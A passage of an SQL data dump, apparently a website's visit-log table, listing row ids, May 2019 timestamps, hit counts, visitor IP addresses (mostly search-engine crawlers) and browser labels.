420516,1557986400,1,1,0,0,'95.108.181.94','other'),(420517,1557986477,1,1,0,0,'95.163.255.193','other'),(420518,1557986551,1,1,0,0,'66.249.66.130','chrome'),(420519,1557986558,1,1,0,0,'207.46.13.24','other'),(420520,1557986569,1,1,0,0,'95.108.213.4','other'),(420521,1557986668,1,1,0,0,'5.255.253.25','other'),(420522,1557986733,1,1,0,0,'5.45.207.76','other'),(420523,1557987352,1,1,0,0,'95.163.255.167','other'),(420524,1557987422,2,2,0,0,'66.249.66.222','chrome'),(420525,1557987669,1,1,0,0,'66.249.66.130','chrome'),(420526,1557987675,1,1,0,0,'66.249.66.128','chrome'),(420527,1557988292,1,1,0,0,'207.46.13.24','other'),(420528,1557988448,1,1,0,0,'8.29.198.27','other'),(420529,1557988457,1,1,0,0,'66.249.66.222','chrome'),(420530,1557988462,1,1,0,0,'8.29.198.26','other'),(420531,1557988596,1,1,0,0,'66.249.66.220','chrome'),(420532,1557988706,1,1,0,0,'66.102.9.22','chrome'),(420533,1557988745,1,1,0,0,'157.55.39.160','other'),(420534,1557989771,2,2,0,0,'66.249.66.222','chrome'),(420535,1557989804,1,1,0,0,'141.8.142.191','other'),(420536,1557990311,1,1,0,0,'207.46.13.170','other'),(420537,1557990871,1,1,0,0,'178.154.244.11','other'),(420538,1557991404,1,1,0,0,'193.106.30.98','chrome'),(420539,1557991668,8,8,0,0,'176.9.9.94','other'),(420540,1557992027,1,1,0,0,'91.196.178.186','chrome'),(420541,1557992297,1,1,0,0,'207.46.13.170','other'),(420542,1557992596,7,7,0,0,'176.9.9.94','other'),(420543,1557992723,1,1,0,0,'157.55.39.160','other'),(420544,1557992801,1,1,0,0,'54.39.148.233','other'),(420545,1557992807,3,3,0,0,'195.206.105.217','other'),(420546,1557993035,1,1,0,0,'91.196.177.15','chrome'),(420547,1557993506,2,2,0,0,'207.46.13.170','other'),(420548,1557993523,2,2,0,0,'176.9.9.94','other'),(420549,1557993570,1,1,0,0,'157.55.39.238','other'),(420550,1557993695,1,1,0,0,'95.163.255.92','other'),(420551,1557993699,1,1,0,0,'95.163.255.95','other'),(420552,1557994414,1,1,0,0,'207.46.13.170','other'),(420553,1557994522,1,1,0,0,'207.46.13.161','other'),(420554,1557994710,2,2,0,0,'94.179.147.128','chrome'),(420555,1557995109,1,1,0,0,'13.66.139.0','other'),(420556,1557995388,1,1,0,0,'178.154.171.17','other'),(420557,1557995658,1,1,0,0,'141.8.142.191','other'),(420558,1557995953,2,2,0,0,'40.77.167.69','other'),(420559,1557996052,1,1,0,0,'94.179.147.128','chrome'),(420560,1557996600,1,1,0,0,'207.46.13.24','other'),(420561,1557997007,1,1,0,0,'207.46.13.125','other'),(420562,1557997491,2,2,0,0,'207.46.13.233','other'),(420563,1557998356,1,1,0,0,'66.249.66.132','chrome'),(420564,1557998850,1,1,0,0,'95.163.255.176','other'),(420565,1557998895,1,1,0,0,'95.108.181.96','other'),(420566,1557999025,1,1,0,0,'66.249.66.222','chrome'),(420567,1557999320,1,1,0,0,'8.29.198.26','other'),(420568,1557999330,1,1,0,0,'8.29.198.25','other'),(420569,1557999382,1,1,0,0,'40.77.167.51','other'),(420570,1558000203,1,1,0,0,'178.154.200.8','other'),(420571,1558000428,1,1,0,0,'141.8.142.103','other'),(420572,1558000436,1,1,0,0,'66.249.66.128','chrome'),(420573,1558000447,1,1,0,0,'66.249.66.222','chrome'),(420574,1558000675,1,1,0,0,'141.8.142.162','other'),(420575,1558001221,1,1,0,0,'180.76.15.29','other'),(420576,1558001324,1,1,0,0,'207.46.13.192','other'),(420577,1558001586,1,1,0,0,'104.227.68.186','chrome'),(420578,1558001665,1,1,0,0,'109.74.154.72','chrome'),(420579,1558001668,1,1,0,0,'207.46.13.151','other'),(420580,1558002015,1,1,0,0,'66.249.66.130','chrome'),(420581,1558002297,1,1,0,0,'54.36.149.96','other'),(420582,1558002335,1,1,0,0,'157.55.39.9','other'),(420583,1558003062,1,1,0,0,'95.135.240.135','firefox'),(420584,1558003583,1,1,0,0,'40.77.167.51','other'),(420585,1558003629,1,1,0,0,'37.146.193.228','msie'),(420586,1558003637,1,1,0,0,'94.180.178.47','msie'),(420587,1558003734,3,3,0,0,'35.192.123.92','chrome'),(420588,1558004008,3,3,0,0,'35.239.24.158','chrome'),(420589,1558004112,3,3,0,0,'104.197.166.156','chrome'),(420590,1558004173,3,3,0,0,'35.226.206.91','chrome'),(420591,1558004217,3,3,0,0,'35.202.190.248','chrome'),(420593,1558004247,2,2,0,0,'35.225.138.76','chrome'),(420594,1558004453,1,1,0,0,'66.249.66.222','chrome'),(420595,1558005023,1,1,0,0,'141.8.142.162','other'),(420596,1558005177,1,1,0,0,'178.154.171.30','other'),(420597,1558006670,1,1,0,0,'37.54.198.129','firefox'),(420598,1558007115,1,1,0,0,'66.249.66.130','chrome'),(420599,1558007378,1,1,0,0,'66.249.66.222','chrome'),(420600,1558008108,1,1,0,0,'157.55.39.223','other'),(420601,1558008317,1,1,0,0,'66.249.66.130','chrome'),(420602,1558008625,1,1,0,0,'157.55.39.165','other'),(420603,1558009589,1,1,0,0,'40.77.167.9','other'),(420604,1558009866,1,1,0,0,'5.45.207.79','other'),(420605,1558009968,1,1,0,0,'66.249.66.130','chrome'),(420606,1558010045,1,1,0,0,'87.250.224.47','other'),(420607,1558010196,1,1,0,0,'8.29.198.27','other'),(420608,1558010203,1,1,0,0,'8.29.198.26','other'),(420609,1558010255,1,1,0,0,'178.154.244.11','other'),(420610,1558010319,1,1,0,0,'66.249.66.222','chrome'),(420611,1558010407,1,1,0,0,'95.163.255.168','other'),(420612,1558010699,3,3,0,0,'91.196.178.88','chrome'),(420613,1558010898,1,1,0,0,'66.249.66.218','chrome'),(420614,1558012265,1,1,0,0,'66.249.66.218','chrome'),(420615,1558012272,1,1,0,0,'66.249.66.220','chrome'),(420616,1558012342,1,1,0,0,'91.196.178.83','chrome'),(420617,1558012794,1,1,0,0,'40.77.167.14','other'),(420618,1558012813,1,1,0,0,'91.196.178.88','chrome'),(420619,1558013195,1,1,0,0,'40.77.167.9','other'),(420620,1558013321,1,1,0,0,'66.249.66.130','chrome'),(420621,1558013358,2,2,0,0,'66.249.66.218','chrome'),(420622,1558013455,1,1,0,0,'157.55.39.165','other'),(420623,1558013619,1,1,0,0,'91.196.177.46','firefox'),(420624,1558013713,1,1,0,0,'66.249.66.128','chrome'),(420625,1558013754,1,1,0,0,'91.196.178.98','chrome'),(420626,1558014168,2,2,0,0,'66.249.66.222','chrome'),(420627,1558014266,2,2,0,0,'66.249.66.218','chrome'),(420628,1558014272,1,1,0,0,'66.249.66.220','chrome'),(420629,1558014377,1,1,0,0,'5.45.207.19','other'),(420630,1558014432,1,1,0,0,'78.110.61.49','firefox'),(420631,1558014547,112,112,0,0,'95.216.16.51','other'),(420632,1558014619,1,1,0,0,'95.132.47.44','chrome'),(420633,1558014718,1,1,0,0,'5.45.207.79','other'),(420634,1558014734,1,1,0,0,'178.154.244.11','other'),(420635,1558014840,1,1,0,0,'40.77.167.9','other'),(420636,1558015389,1,1,0,0,'66.249.66.222','chrome'),(420637,1558015448,91,91,0,0,'95.216.16.51','other'),(420638,1558015656,1,1,0,0,'178.154.244.11','other'),(420639,1558015680,1,1,0,0,'66.249.66.220','chrome'),(420640,1558016357,80,80,0,0,'95.216.16.51','other'),(420641,1558016740,1,1,0,0,'13.66.139.0','other'),(420642,1558017091,1,1,0,0,'157.55.39.204','other'),(420643,1558017351,1,1,0,0,'66.249.66.128','chrome'),(420644,1558017429,1,1,0,0,'40.77.167.14','other'),(420645,1558017431,1,1,0,0,'66.249.66.218','chrome'),(420646,1558018776,1,1,0,0,'66.249.66.220','chrome'),(420647,1558019750,1,1,0,0,'13.66.139.0','other'),(420648,1558020118,2,2,0,0,'95.163.255.98','other'),(420649,1558020155,2,2,0,0,'40.77.167.14','other'),(420650,1558020585,2,2,0,0,'66.249.66.132','chrome'),(420651,1558020801,1,1,0,0,'66.249.66.128','chrome'),(420652,1558021077,1,1,0,0,'8.29.198.25','other'),(420653,1558021079,1,1,0,0,'8.29.198.27','other'),(420654,1558021452,1,1,0,0,'95.163.255.193','other'),(420655,1558022052,1,1,0,0,'66.249.66.132','chrome'),(420656,1558022216,1,1,0,0,'66.249.66.218','chrome'),(420657,1558022941,1,1,0,0,'66.249.66.222','chrome'),(420658,1558023368,1,1,0,0,'66.249.66.130','chrome'),(420659,1558023479,1,1,0,0,'5.45.207.19','other'),(420660,1558023895,2,2,0,0,'157.55.39.245','other'),(420661,1558024918,1,1,0,0,'66.249.66.218','chrome'),(420662,1558025377,2,2,0,0,'157.55.39.245','other'),(420663,1558025411,1,1,0,0,'157.55.39.72','other'),(420664,1558025465,3,3,0,0,'95.216.19.59','other'),(420665,1558025603,1,1,0,0,'66.249.66.222','chrome'),(420666,1558025651,1,1,0,0,'40.77.167.175','other'),(420667,1558025713,1,1,0,0,'66.249.66.128','chrome'),(420668,1558026871,1,1,0,0,'66.249.66.132','chrome'),(420669,1558027062,1,1,0,0,'157.55.39.72','other'),(420670,1558027103,1,1,0,0,'95.163.255.95','other'),(420671,1558027150,2,2,0,0,'157.55.39.130','other'),(420672,1558027304,1,1,0,0,'66.249.66.220','chrome'),(420673,1558027435,3,3,0,0,'157.55.39.245','other'),(420674,1558027663,1,1,0,0,'209.17.96.26','other'),(420675,1558028467,1,1,0,0,'157.55.39.81','other'),(420676,1558028809,3,3,0,0,'66.249.66.128','chrome'),(420677,1558029294,1,1,0,0,'66.249.66.220','chrome'),(420678,1558029967,1,1,0,0,'157.55.39.130','other'),(420679,1558030655,1,1,0,0,'157.55.39.245','other'),(420680,1558031085,2,2,0,0,'157.55.39.130','other'),(420681,1558031792,1,1,0,0,'104.148.64.26','chrome'),(420682,1558031912,1,1,0,0,'157.55.39.245','other'),(420683,1558031951,1,1,0,0,'8.29.198.27','other'),(420684,1558031960,1,1,0,0,'8.29.198.26','other'),(420685,1558032002,1,1,0,0,'66.249.66.128','chrome'),(420686,1558032157,3,3,0,0,'66.249.66.222','chrome'),(420687,1558032191,1,1,0,0,'107.178.194.254','chrome'),(420688,1558032692,1,1,0,0,'5.45.207.19','other'),(420689,1558033220,3,3,0,0,'157.55.39.81','other'),(420690,1558033390,1,1,0,0,'95.133.151.60','firefox'),(420691,1558033776,1,1,0,0,'87.250.224.65','other'),(420692,1558033784,1,1,0,0,'207.46.13.213','other'),(420693,1558033841,1,1,0,0,'207.46.13.122','other'),(420694,1558035644,1,1,0,0,'193.106.30.98','chrome'),(420695,1558035959,1,1,0,0,'178.154.244.11','other'),(420696,1558036846,1,1,0,0,'207.46.13.122','other'),(420697,1558036962,1,1,0,0,'207.46.13.213','other'),(420698,1558036990,1,1,0,0,'95.163.255.99','other'),(420699,1558038008,1,1,0,0,'207.46.13.213','other'),(420700,1558038808,1,1,0,0,'66.249.66.128','chrome'),(420701,1558038820,1,1,0,0,'66.249.66.222','chrome'),(420702,1558039388,2,2,0,0,'207.46.13.213','other'),(420703,1558039503,1,1,0,0,'157.55.39.81','other'),(420704,1558039519,1,1,0,0,'66.249.66.130','chrome'),(420705,1558040929,1,1,0,0,'157.55.39.81','other'),(420706,1558041175,1,1,0,0,'91.196.178.135','chrome'),(420707,1558041647,1,1,0,0,'66.249.66.220','chrome'),(420708,1558041851,2,2,0,0,'207.46.13.213','other'),(420709,1558042344,1,1,0,0,'95.163.255.170','other'),(420710,1558042707,1,1,0,0,'66.249.66.218','chrome'),(420711,1558042821,1,1,0,0,'8.29.198.25','other'),(420712,1558042833,1,1,0,0,'8.29.198.27','other'),(420713,1558042916,1,1,0,0,'95.163.255.96','other'),(420714,1558043268,1,1,0,0,'157.55.39.81','other'),(420715,1558044057,1,1,0,0,'40.77.167.85','other'),(420716,1558044059,1,1,0,0,'207.46.13.213','other'),(420717,1558044381,1,1,0,0,'95.163.255.177','other'),(420718,1558045865,1,1,0,0,'66.249.66.220','chrome'),(420719,1558045964,2,2,0,0,'157.55.39.81','other'),(420720,1558047110,1,1,0,0,'207.46.13.122','other'),(420721,1558047289,1,1,0,0,'40.77.167.85','other'),(420722,1558047541,1,1,0,0,'157.55.39.81','other'),(420723,1558048384,1,1,0,0,'66.249.66.220','chrome'),(420724,1558048480,1,1,0,0,'207.46.13.122','other'),(420725,1558048888,1,1,0,0,'95.108.213.4','other'),(420726,1558049396,1,1,0,0,'95.163.255.153','other'),(420727,1558050046,1,1,0,0,'207.46.13.122','other'),(420728,1558050424,1,1,0,0,'178.154.244.11','other'),(420729,1558051193,1,1,0,0,'13.66.139.0','other'),(420730,1558051414,1,1,0,0,'40.77.167.85','other'),(420731,1558051890,1,1,0,0,'40.77.167.62','other'),(420732,1558053692,1,1,0,0,'8.29.198.27','other'),(420733,1558053712,1,1,0,0,'8.29.198.26','other'),(420734,1558055031,1,1,0,0,'5.45.207.79','other'),(420735,1558055113,1,1,0,0,'87.250.224.47','other'),(420736,1558055179,1,1,0,0,'87.250.224.65','other'),(420737,1558055187,1,1,0,0,'37.9.113.103','other'),(420738,1558055186,1,1,0,0,'66.249.66.130','chrome'),(420739,1558055429,1,1,0,0,'40.77.167.85','other'),(420740,1558055740,1,1,0,0,'66.249.66.222','chrome'),(420741,1558055905,1,1,0,0,'66.249.66.218','chrome'),(420742,1558056751,1,1,0,0,'180.76.15.30','other'),(420743,1558056827,1,1,0,0,'207.46.13.122','other'),(420744,1558057791,1,1,0,0,'40.77.167.128','other'),(420745,1558059372,1,1,0,0,'66.249.66.218','chrome'),(420746,1558059511,1,1,0,0,'40.77.167.215','other'),(420747,1558059683,2,2,0,0,'40.77.167.128','other'),(420748,1558059898,1,1,0,0,'213.180.203.40','other'),(420749,1558059982,1,1,0,0,'178.154.244.11','other'),(420750,1558060410,1,1,0,0,'95.163.255.93','other'),(420751,1558060902,1,1,0,0,'5.45.207.79','other'),(420752,1558061675,1,1,0,0,'66.249.66.218','chrome'),(420753,1558061883,2,2,0,0,'54.191.85.23','chrome'),(420754,1558062185,1,1,0,0,'40.77.167.215','other'),(420755,1558062792,1,1,0,0,'66.249.66.130','chrome'),(420756,1558063373,1,1,0,0,'66.249.66.220','chrome'),(420757,1558063929,1,1,0,0,'40.77.167.130','other'),(420758,1558064156,1,1,0,0,'5.45.207.79','other'),(420759,1558064284,1,1,0,0,'40.77.167.128','other'),(420760,1558064311,1,1,0,0,'178.154.244.11','other'),(420761,1558064564,1,1,0,0,'8.29.198.25','other'),(420762,1558064583,1,1,0,0,'8.29.198.26','other'),(420763,1558065690,1,1,0,0,'124.93.96.216','other'),(420764,1558066442,1,1,0,0,'66.249.66.220','chrome'),(420765,1558066756,1,1,0,0,'141.8.142.103','other'),(420766,1558067635,1,1,0,0,'95.163.255.92','other'),(420767,1558068625,1,1,0,0,'37.9.113.20','other'),(420768,1558069131,1,1,0,0,'40.77.167.215','other'),(420769,1558069301,1,1,0,0,'178.154.244.11','other'),(420770,1558069371,1,1,0,0,'5.45.207.79','other'),(420771,1558069472,2,2,0,0,'40.77.167.208','other'),(420772,1558069516,1,1,0,0,'5.45.207.19','other'),(420773,1558070586,1,1,0,0,'40.77.167.208','other'),(420774,1558070891,1,1,0,0,'157.55.39.105','other'),(420775,1558070923,1,1,0,0,'51.15.37.97','other'),(420776,1558071306,1,1,0,0,'66.249.66.128','chrome'),(420777,1558071366,1,1,0,0,'66.249.66.130','chrome'),(420778,1558071852,1,1,0,0,'157.55.39.105','other'),(420779,1558071863,1,1,0,0,'66.249.66.218','chrome'),(420780,1558072408,1,1,0,0,'13.66.139.0','other'),(420781,1558072473,1,1,0,0,'91.196.177.46','firefox'),(420782,1558072850,3,3,0,0,'66.249.66.220','chrome'),(420783,1558073520,1,1,0,0,'40.77.167.215','other'),(420784,1558074554,1,1,0,0,'66.249.66.130','chrome'),(420785,1558075210,1,1,0,0,'91.196.178.93','firefox'),(420786,1558075380,1,1,0,0,'5.45.207.79','other'),(420787,1558075406,1,1,0,0,'5.45.207.19','other'),(420788,1558075435,1,1,0,0,'95.132.50.219','chrome'),(420789,1558075437,1,1,0,0,'8.29.198.26','other'),(420790,1558075449,1,1,0,0,'8.29.198.25','other'),(420791,1558076055,1,0,1,0,'66.249.66.220',''),(420792,1558076125,1,1,0,0,'207.46.13.118','other'),(420793,1558076228,1,1,0,0,'178.154.244.11','other'),(420794,1558076272,1,1,0,0,'13.66.139.0','other'),(420795,1558076554,1,1,0,0,'66.249.66.130','chrome'),(420796,1558077549,1,1,0,0,'40.77.167.189','other'),(420797,1558078705,1,1,0,0,'94.198.51.242','chrome'),(420798,1558078737,1,1,0,0,'95.163.255.98','other'),(420799,1558078740,1,1,0,0,'95.163.255.99','other'),(420800,1558079377,1,1,0,0,'207.46.13.60','other'),(420801,1558079822,1,1,0,0,'66.249.66.128','chrome'),(420802,1558080039,1,1,0,0,'66.249.66.132','chrome'),(420803,1558080420,1,1,0,0,'66.249.66.130','chrome'),(420804,1558080430,1,1,0,0,'66.249.66.220','chrome'),(420805,1558080434,1,1,0,0,'207.46.13.151','other'),(420806,1558080513,1,1,0,0,'207.46.13.61','other'),(420807,1558080530,1,1,0,0,'95.24.4.142','msie'),(420808,1558081036,2,2,0,0,'5.45.207.79','other'),(420809,1558081197,1,1,0,0,'95.108.213.4','other'),(420810,1558081250,1,1,0,0,'87.250.224.47','other'),(420811,1558081526,1,1,0,0,'40.77.167.190','other'),(420812,1558081603,1,1,0,0,'207.46.13.151','other'),(420813,1558081636,1,1,0,0,'66.249.66.128','chrome'),(420814,1558081944,1,1,0,0,'5.45.207.79','other'),(420815,1558082110,1,1,0,0,'95.108.213.4','other'),(420816,1558082256,1,1,0,0,'66.249.66.220','chrome'),(420817,1558082454,1,1,0,0,'66.249.66.222','chrome'),(420818,1558082481,1,1,0,0,'66.249.66.132','chrome'),(420819,1558082499,1,1,0,0,'5.45.207.19','other'),(420820,1558083384,1,1,0,0,'91.196.177.46','firefox'),(420821,1558083791,1,1,0,0,'66.249.66.222','chrome'),(420822,1558084457,1,1,0,0,'157.55.39.108','other'),(420823,1558084979,1,1,0,0,'92.60.182.17','chrome'),(420824,1558084996,1,1,0,0,'66.249.66.220','chrome'),(420825,1558085356,1,1,0,0,'66.249.66.222','chrome'),(420826,1558085759,1,1,0,0,'157.55.39.108','other'),(420827,1558085967,1,1,0,0,'66.249.66.132','chrome'),(420828,1558086257,2,2,0,0,'66.249.66.220','chrome'),(420829,1558086297,1,1,0,0,'8.29.198.26','other'),(420830,1558086307,1,1,0,0,'8.29.198.27','other'),(420831,1558086523,1,1,0,0,'40.77.167.190','other'),(420832,1558086679,1,1,0,0,'157.55.39.178','other'),(420833,1558086722,1,1,0,0,'37.9.113.148','other'),(420834,1558086751,1,1,0,0,'178.154.244.11','other'),(420835,1558086976,1,1,0,0,'207.46.13.195','other'),(420836,1558086985,1,1,0,0,'5.45.207.79','other'),(420837,1558087493,2,2,0,0,'40.77.167.68','other'),(420838,1558087773,2,2,0,0,'66.249.66.222','chrome'),(420839,1558087993,1,1,0,0,'66.249.66.220','chrome'),(420840,1558088203,1,1,0,0,'5.45.207.79','other'),(420841,1558088390,1,1,0,0,'109.74.154.72','chrome'),(420842,1558088813,1,1,0,0,'141.8.142.103','other'),(420843,1558090003,1,1,0,0,'193.106.30.98','chrome'),(420844,1558090166,3,3,0,0,'35.202.122.137','chrome'),(420845,1558090256,3,3,0,0,'35.202.27.63','chrome'),(420846,1558090264,1,1,0,0,'95.163.255.96','other'),(420847,1558090311,3,3,0,0,'35.202.37.166','chrome'),(420848,1558090346,3,3,0,0,'35.239.73.140','chrome'),(420849,1558090373,3,3,0,0,'104.154.55.252','chrome'),(420850,1558090388,2,2,0,0,'35.225.2.145','chrome'),(420852,1558090436,1,1,0,0,'66.249.66.218','chrome'),(420853,1558090766,1,1,0,0,'95.163.255.97','other'),(420854,1558092105,1,1,0,0,'37.9.113.103','other'),(420855,1558092176,1,1,0,0,'95.108.181.75','other'),(420856,1558092262,1,1,0,0,'5.45.207.79','other'),(420857,1558092872,1,1,0,0,'66.249.66.128','chrome'),(420858,1558093891,1,1,0,0,'66.249.66.222','chrome'),(420859,1558094113,1,1,0,0,'40.77.167.46','other'),(420860,1558094466,1,1,0,0,'5.153.178.14','chrome'),(420861,1558095978,1,1,0,0,'46.166.190.169','other'),(420862,1558095988,1,1,0,0,'95.135.53.165','chrome'),(420863,1558096424,1,1,0,0,'46.149.182.188','chrome'),(420864,1558096995,2,2,0,0,'66.249.66.220','chrome'),(420865,1558097055,1,1,0,0,'87.250.224.65','other'),(420866,1558097165,1,1,0,0,'8.29.198.26','other'),(420867,1558097190,1,1,0,0,'8.29.198.27','other'),(420868,1558097357,2,2,0,0,'157.55.39.149','other'),(420869,1558097706,1,1,0,0,'178.154.244.11','other'),(420870,1558097769,2,2,0,0,'66.249.66.222','chrome'),(420871,1558097797,1,1,0,0,'66.249.66.130','chrome'),(420872,1558098762,1,1,0,0,'66.249.66.222','chrome'),(420873,1558099349,1,1,0,0,'66.249.66.132','chrome'),(420874,1558099448,1,1,0,0,'13.66.139.0','other'),(420875,1558099820,1,1,0,0,'66.249.66.220','chrome'),(420876,1558099831,1,1,0,0,'66.249.66.218','chrome'),(420877,1558099917,2,2,0,0,'66.249.66.222','chrome'),(420878,1558100667,1,1,0,0,'157.55.39.149','other'),(420879,1558101058,1,1,0,0,'66.249.66.218','chrome'),(420880,1558101486,1,1,0,0,'5.45.207.79','other'),(420881,1558101598,1,1,0,0,'178.154.244.11','other'),(420882,1558101967,1,1,0,0,'66.249.66.222','chrome'),(420883,1558101998,1,1,0,0,'66.249.66.220','chrome'),(420884,1558102331,2,2,0,0,'51.77.52.160','chrome'),(420885,1558102581,1,1,0,0,'178.154.244.11','other'),(420886,1558103105,1,1,0,0,'66.249.66.220','chrome'),(420887,1558103556,1,1,0,0,'91.209.11.236','other'),(420888,1558103593,1,1,0,0,'66.249.66.222','chrome'),(420889,1558104843,1,1,0,0,'91.196.178.94','chrome'),(420890,1558105258,1,1,0,0,'178.154.244.11','other'),(420891,1558105560,1,1,0,0,'66.249.66.220','chrome'),(420892,1558105942,1,1,0,0,'185.76.69.66','chrome'),(420893,1558106129,1,1,0,0,'157.55.39.81','other'),(420894,1558106475,1,1,0,0,'5.45.207.19','other'),(420895,1558106856,1,1,0,0,'95.163.255.98','other'),(420896,1558107423,1,1,0,0,'5.45.207.79','other'),(420897,1558108047,1,1,0,0,'8.29.198.26','other'),(420898,1558108064,1,1,0,0,'8.29.198.25','other'),(420899,1558108284,1,1,0,0,'87.250.224.65','other'),(420900,1558108651,1,1,0,0,'138.201.249.86','chrome'),(420901,1558108955,2,2,0,0,'66.249.66.220','chrome'),(420902,1558109609,1,1,0,0,'95.163.255.177','other'),(420903,1558109670,1,1,0,0,'157.55.39.76','other'),(420904,1558109744,2,2,0,0,'66.249.66.218','chrome'),(420905,1558109880,1,1,0,0,'95.163.255.156','other'),(420906,1558111599,1,1,0,0,'66.249.66.222','chrome'),(420907,1558111817,1,1,0,0,'66.249.66.128','chrome'),(420908,1558111931,1,1,0,0,'66.249.66.218','chrome'),(420909,1558112011,1,1,0,0,'46.211.72.104','chrome'),(420910,1558112666,1,1,0,0,'66.249.66.130','chrome'),(420911,1558112765,1,1,0,0,'13.66.139.0','other'),(420912,1558112853,1,1,0,0,'66.249.66.220','chrome'),(420913,1558113473,1,1,0,0,'157.55.39.76','other'),(420914,1558113627,1,1,0,0,'66.249.66.128','chrome'),(420915,1558113674,1,1,0,0,'157.55.39.81','other'),(420916,1558113813,1,1,0,0,'66.249.66.222','chrome'),(420917,1558113824,1,1,0,0,'66.249.66.220','chrome'),(420918,1558113859,1,1,0,0,'157.55.39.149','other'),(420919,1558114782,1,1,0,0,'207.46.13.173','other'),(420920,1558114927,1,1,0,0,'193.106.30.98','chrome'),(420921,1558115029,1,1,0,0,'178.154.244.11','other'),(420922,1558115103,1,1,0,0,'66.249.66.218','chrome'),(420923,1558116107,1,1,0,0,'207.46.13.30','other'),(420924,1558116114,1,1,0,0,'178.154.244.11','other'),(420925,1558116382,1,1,0,0,'95.163.255.95','other'),(420926,1558117032,1,1,0,0,'207.46.13.218','other'),(420927,1558117479,9,9,0,0,'207.46.13.219','other'),(420928,1558117563,1,1,0,0,'46.211.9.140','chrome'),(420929,1558118045,12,12,0,0,'207.46.13.218','other'),(420930,1558118056,5,5,0,0,'207.46.13.173','other'),(420931,1558118070,4,4,0,0,'157.55.39.81','other'),(420932,1558118267,1,1,0,0,'178.154.244.11','other'),(420933,1558118797,1,1,0,0,'5.45.207.79','other'),(420934,1558118925,1,1,0,0,'8.29.198.27','other'),(420935,1558118961,1,1,0,0,'8.29.198.25','other'),(420936,1558119190,1,1,0,0,'157.55.39.81','other'),(420937,1558119590,1,1,0,0,'207.46.13.158','other'),(420938,1558119602,1,1,0,0,'66.249.66.220','chrome'),(420939,1558119624,1,1,0,0,'93.80.32.83','msie'),(420940,1558119724,1,1,0,0,'207.46.13.218','other'),(420941,1558120319,1,1,0,0,'76.106.206.183','chrome'),(420942,1558120940,1,1,0,0,'207.46.13.173','other'),(420943,1558121006,3,3,0,0,'66.249.66.220','chrome'),(420944,1558121018,2,2,0,0,'66.249.66.218','chrome'),(420945,1558121022,1,1,0,0,'148.64.56.71','other'),(420946,1558121194,6,6,0,0,'66.249.66.222','chrome'),(420947,1558121327,1,1,0,0,'91.196.178.134','chrome'),(420948,1558121420,1,1,0,0,'178.154.244.11','other'),(420949,1558121535,1,1,0,0,'141.8.142.103','other'),(420950,1558121911,1,1,0,0,'207.46.13.173','other'),(420951,1558121963,7,7,0,0,'66.249.66.220','chrome'),(420952,1558122101,1,1,0,0,'95.163.255.95','other'),(420953,1558122212,1,1,0,0,'40.77.167.42','other'),(420954,1558122554,1,1,0,0,'207.46.13.67','other'),(420955,1558122576,1,1,0,0,'95.163.255.93','other'),(420956,1558122993,1,1,0,0,'66.249.66.218','chrome'),(420957,1558123091,1,1,0,0,'66.249.66.220','chrome'),(420958,1558123446,1,1,0,0,'95.163.255.92','other'),(420959,1558124504,1,1,0,0,'66.249.66.218','chrome'),(420960,1558124526,1,1,0,0,'141.8.142.103','other'),(420961,1558124529,1,1,0,0,'37.9.113.148','other'),(420962,1558124550,2,2,0,0,'178.154.244.11','other'),(420963,1558124568,1,1,0,0,'66.249.66.220','chrome'),(420964,1558124698,1,1,0,0,'87.250.224.47','other'),(420965,1558126267,1,1,0,0,'66.249.66.130','chrome'),(420966,1558126378,1,1,0,0,'95.163.255.163','other'),(420967,1558126480,2,2,0,0,'66.249.66.218','chrome'),(420968,1558126927,1,1,0,0,'66.249.66.220','chrome'),(420969,1558127561,1,1,0,0,'207.46.13.67','other'),(420970,1558127889,2,2,0,0,'66.249.66.218','chrome'),(420971,1558128028,1,1,0,0,'178.154.244.11','other'),(420972,1558128177,1,1,0,0,'141.8.142.103','other'),(420973,1558128253,1,1,0,0,'66.249.66.128','chrome'),(420974,1558128689,1,1,0,0,'66.249.66.132','chrome'),(420975,1558128876,1,1,0,0,'207.46.13.54','other'),(420976,1558129215,1,1,0,0,'5.45.207.19','other'),(420977,1558129775,2,2,0,0,'8.29.198.25','other'),(420978,1558129795,1,1,0,0,'66.249.66.132','chrome'),(420979,1558130168,1,1,0,0,'66.249.66.222','chrome'),(420980,1558131238,1,1,0,0,'66.249.66.220','chrome'),(420981,1558131572,2,2,0,0,'66.249.66.218','chrome'),(420982,1558132651,1,1,0,0,'66.249.66.130','chrome'),(420983,1558133561,1,1,0,0,'109.201.152.231','other'),(420984,1558134668,2,2,0,0,'87.250.224.47','other'),(420985,1558134704,1,1,0,0,'5.45.207.19','other'),(420986,1558136266,1,1,0,0,'66.249.66.220','chrome'),(420987,1558136336,1,1,0,0,'66.249.66.128','chrome'),(420988,1558136834,1,1,0,0,'193.106.30.98','chrome'),(420989,1558137323,1,1,0,0,'207.46.13.54','other'),(420990,1558137449,1,1,0,0,'40.77.167.174','other'),(420991,1558138212,1,1,0,0,'40.77.167.69','other'),(420992,1558138924,1,1,0,0,'178.154.244.11','other'),(420993,1558139504,2,2,0,0,'5.45.207.79','other'),(420994,1558139839,1,1,0,0,'141.8.142.103','other'),(420995,1558140243,1,1,0,0,'178.154.244.11','other'),(420996,1558140254,1,1,0,0,'95.108.213.4','other'),(420997,1558140633,1,1,0,0,'8.29.198.25','other'),(420998,1558140677,1,1,0,0,'66.249.66.218','chrome'),(420999,1558140694,1,1,0,0,'8.29.198.27','other'),(421000,1558140834,1,1,0,0,'207.46.13.67','other'),(421001,1558141119,1,1,0,0,'54.149.26.52','other'),(421002,1558142696,1,1,0,0,'66.249.66.132','chrome'),(421003,1558142722,1,1,0,0,'66.249.66.220','chrome'),(421004,1558143413,2,2,0,0,'40.77.167.62','other'),(421005,1558143477,1,1,0,0,'207.46.13.104','other'),(421006,1558143938,5,5,0,0,'46.19.234.34','chrome'),(421007,1558144058,1,1,0,0,'95.108.213.4','other'),(421008,1558144293,4,4,0,0,'149.56.142.192','chrome'),(421009,1558144395,2,2,0,0,'40.77.167.207','other'),(421010,1558144769,1,1,0,0,'178.154.244.11','other'),(421011,1558144959,1,1,0,0,'66.249.66.128','chrome'),(421012,1558145300,2,2,0,0,'40.77.167.60','other'),(421013,1558146111,1,1,0,0,'66.249.66.220','chrome'),(421014,1558147044,1,1,0,0,'40.77.167.207','other'),(421015,1558147141,1,1,0,0,'40.77.167.62','other'),(421016,1558147347,1,1,0,0,'66.249.66.128','chrome'),(421017,1558147458,1,1,0,0,'66.249.66.130','chrome'),(421018,1558147479,1,1,0,0,'95.108.181.54','other'),(421019,1558147529,1,1,0,0,'178.154.171.27','other'),(421020,1558147568,1,1,0,0,'66.249.66.218','chrome'),(421021,1558147663,1,1,